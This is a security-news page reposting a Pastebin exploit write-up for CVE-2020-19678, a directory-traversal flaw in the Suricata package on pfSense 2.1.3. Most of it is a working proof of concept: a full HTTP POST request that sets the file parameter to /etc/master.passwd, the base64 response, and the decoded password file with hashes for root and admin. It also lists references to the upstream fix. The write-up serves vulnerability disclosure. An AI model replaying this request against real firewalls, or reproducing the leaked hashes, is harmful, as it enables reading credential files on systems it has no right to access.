Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-19678: LFI vulnerability in Suricata 1.4.6 on Pfsense 2.1.3 - Pastebin.com

Directory Traversal vulnerability found in Pfsense v.2.1.3 and Pfsense Suricata v.1.4.6 pkg v.1.0.1 allows a remote attacker to obtain sensitive information via the file parameter to suricata/suricata_logs_browser.php.

CVE
Open in Source
#csrf#vulnerability#web#js#git#php#auth#ssh#firefox

  1. # Exploit Title: LFI(Local File Inclusion) vulnerability in Suricata 1.4.6 on Pfsense 2.1.3

  2. # Date: 2014-05-21

  3. # Software Link: https://www.pfsense.org/

  4. # Version: 2.1.3

  5. # Vendor: Pfsense

  6. # Exploit Author: Vu Van Hieu - [email protected], Nguyen Quoc Viet - [email protected]

  7. # CVE: CVE-2020-19678

  8. # Category: IDS

  9. # Tested on: Firefox

  1. # Description

  2. # There is a LFI(Local File Inclusion) vulnerability in Suricata 1.4.6 pkg v1.0.1 on Pfsense 2.1.3

  3. # It allows attacker to include files on a server through the web browser, and read any files on server.

  4. # The vulnerability allows remote attackers to retrieve arbitrary files via the file parameter to /suricata/suricata_logs_browser.php

  1. # POC

  2. This is an POST HEADER when you access to https://Your_Pfsense_Server/suricata/suricata_logs_browser.php. You can modified “file” parameter to read any file(Example: /etc/master.passwd):

  3. + HTTP POST header:

  4. ```

  5. Host: Your_Pfsense_Server

  6. User-Agent: Mozilla/5.0

  7. Accept: */*

  8. Accept-Language: en-us,en;q=0.5

  9. Accept-Encoding: gzip, deflate

  10. Content-Type: application/x-www-form-urlencoded; charset=UTF-8

  11. X-Requested-With: XMLHttpRequest

  12. Referer: https://Your_Pfsense_Server/suricata/suricata_logs_browser.php

  13. Content-Length: 132 Cookie: cookie_test=1400576638; PHPSESSID=7d20151aeace555ee38d8d923f47c3aa

  14. Connection: keep-alive

  15. Pragma: no-cache

  16. Cache-Control: no-cache

  1. __csrf_magic=sid:4c06775fcb95114389a0da397f509158d261ea54,1400573055&action=load&file=/etc/master.passwd

  2. ```

  1. + The server will response Base64 Encoded data:

  2. ```

  3. |0|/etc/master.passwd|IyAkRnJlZUJTRDogc3JjL2V0Yy9tYXN0ZXIucGFzc3dkLHYgMS4zOSAyMDA0LzA4LzAxIDIxOjMzOjQ3IG1hcmttIEV4cCAkCiMKcm9vdDokMSRkU0pJbUZwaCRHdlo3LjFVYnVXdS5ZYjhldEMwcmUuOjA6MDo6MDowOkNoYXJsaWUgJjovcm9vdDovYmluL3NoCnRvb3I6KjowOjA6OjA6MDpCb3VybmUtYWdhaW4gU3VwZXJ1c2VyOi9yb290OgpkYWVtb246KjoxOjE6OjA6MDpPd25lciBvZiBtYW55IHN5c3RlbSBwcm9jZXNzZXM6L3Jvb3Q6L3Vzci9zYmluL25vbG9naW4Kb3BlcmF0b3I6KjoyOjU6OjA6MDpTeXN0ZW0gJjovOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbjoqOjM6Nzo6MDowOkJpbmFyaWVzIENvbW1hbmRzIGFuZCBTb3VyY2U6LzovdXNyL3NiaW4vbm9sb2dpbgp0dHk6Kjo0OjY1NTMzOjowOjA6VHR5IFNhbmRib3g6LzovdXNyL3NiaW4vbm9sb2dpbgprbWVtOio6NTo2NTUzMzo6MDowOktNZW0gU2FuZGJveDovOi91c3Ivc2Jpbi9ub2xvZ2luCmdhbWVzOio6NzoxMzo6MDowOkdhbWVzIHBzZXVkby11c2VyOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbmV3czoqOjg6ODo6MDowOk5ld3MgU3Vic3lzdGVtOi86L3Vzci9zYmluL25vbG9naW4KbWFuOio6OTo5OjowOjA6TWlzdGVyIE1hbiBQYWdlczovdXNyL3NoYXJlL21hbjovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOio6MjI6MjI6OjA6MDpTZWN1cmUgU2hlbGwgRGFlbW9uOi92YXIvZW1wdHk6L3Vzci9zYmluL25vbG9naW4Kc21tc3A6KjoyNToyNTo6MDowOlNlbmRtYWlsIFN1Ym1pc3Npb24gVXNlcjovdmFyL3Nwb29sL2NsaWVudG1xdWV1ZTovdXNyL3NiaW4vbm9sb2dpbgptYWlsbnVsbDoqOjI2OjI2OjowOjA6U2VuZG1haWwgRGVmYXVsdCBVc2VyOi92YXIvc3Bvb2wvbXF1ZXVlOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbmQ6Kjo1Mzo1Mzo6MDowOkJpbmQgU2FuZGJveDovOi91c3Ivc2Jpbi9ub2xvZ2luCnByb3h5Oio6NjI6NjI6OjA6MDpQYWNrZXQgRmlsdGVyIHBzZXVkby11c2VyOi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpfcGZsb2dkOio6NjQ6NjQ6OjA6MDpwZmxvZ2QgcHJpdnNlcCB1c2VyOi92YXIvZW1wdHk6L3Vzci9zYmluL25vbG9naW4Kd3d3Oio6ODA6ODA6OjA6MDpXb3JsZCBXaWRlIFdlYiBPd25lcjovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Oio6NjU1MzQ6NjU1MzQ6OjA6MDpVbnByaXZpbGVnZWQgdXNlcjovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KZGhjcGQ6KjoxMDAyOjEwMDI6OjA6MDpESENQIERhZW1vbjovbm9uZXhpc3RlbnQ6L3NiaW4vbm9sb2dpbgpfZGhjcDoqOjY1OjY1OjowOjA6ZGhjcCBwcm9ncmFtczovdmFyL2VtcHR5Oi91c3Ivc2Jpbi9ub2xvZ2luCl9pc2FrbXBkOio6Njg6Njg6OjA6MDppc2FrbXBkIHByaXZzZXA6L3Zhci9lbXB0eTovc2Jpbi9ub2xvZ2luCnV1Y3A6Kjo2Njo2Njo6MDowOlVVQ1AgcHNldWRvLXVzZXI6L3Zhci9zcG9vbC91dWNwcHVibGljOi91c3IvbG9jYWwvbGliZXhlYy91dWNwL3V1Y2ljbwpwb3A6Kjo2ODo2OjowOjA6UG9zdCBPZmZpY2UgT3duZXI6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9udHA6KjoxMjM6MTIzOjowOjA6TlRQIGRhZW1vbjovdmFyL2VtcHR5Oi9zYmluL25vbG9naW4KX3JlbGF5ZDoqOjkxMzo5MTM6OjA6MDpSZWxheSBEYWVtb246L3Zhci9lbXB0eTovdXNyL3NiaW4vbm9sb2dpbgphZG1pbjokMSRkU0pJbUZwaCRHdlo3LjFVYnVXdS5ZYjhldEMwcmUuOjA6MDo6MDowOlN5c3RlbSBBZG1pbmlzdHJhdG9yOi9yb290Oi9ldGMvcmMuaW5pdGlhbAp0ZXN0OipMT0NLRUQqJDEkTWoxY0RpdDIkQUpoZVlBalV1ZXIwa2dUWHd6dXRzLzoyMDAwOjY1NTM0OjowOjA6Oi9ob21lL3Rlc3Q6L3NiaW4vbm9sb2dpbgo=|

  4. ```

  1. + Decode the content in Base64:

  2. ```

  3. # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $

  5. root:$1$dSJImFph$GvZ7.1UbuWu.

  6. Yb8etC0re.:0:0::0:0:Charlie &:/root:/bin/sh

  7. toor:*:0:0::0:0:Bourne-again Superuser:/root:

  8. daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin

  9. operator:*:2:5::0:0:System &:/:/usr/sbin/nologin

  10. bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin

  11. tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin

  12. kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin

  13. games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin

  14. news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin

  15. man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin

  16. sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin

  17. smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin

  18. mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin

  19. bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin

  20. proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin

  21. _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin

  22. www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin

  23. nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin

  24. dhcpd:*:1002:1002::0:0:DHCP Daemon:/nonexistent:/sbin/nologin

  25. _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin

  26. _isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin

  27. uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico

  28. pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin

  29. _ntp:*:123:123::0:0:NTP daemon:/var/empty:/sbin/nologin

  30. _relayd:*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologin

  31. admin:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:System Administrator:/root:/etc/rc.initial

  32. test:*LOCKED*$1$Mj1cDit2$AJheYAjUuer0kgTXwzuts/:2000:65534::0:0::/home/test:/sbin/nologin

  33. ```

  1. #REF

  2. https://github.com/pfsense/pfsense-packages/pull/659

  3. https://github.com/pfsense/pfsense-packages/commit/59ed3438729fd56452f58a0f79f0c288db982ac3

  4. http://www.2ngon.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE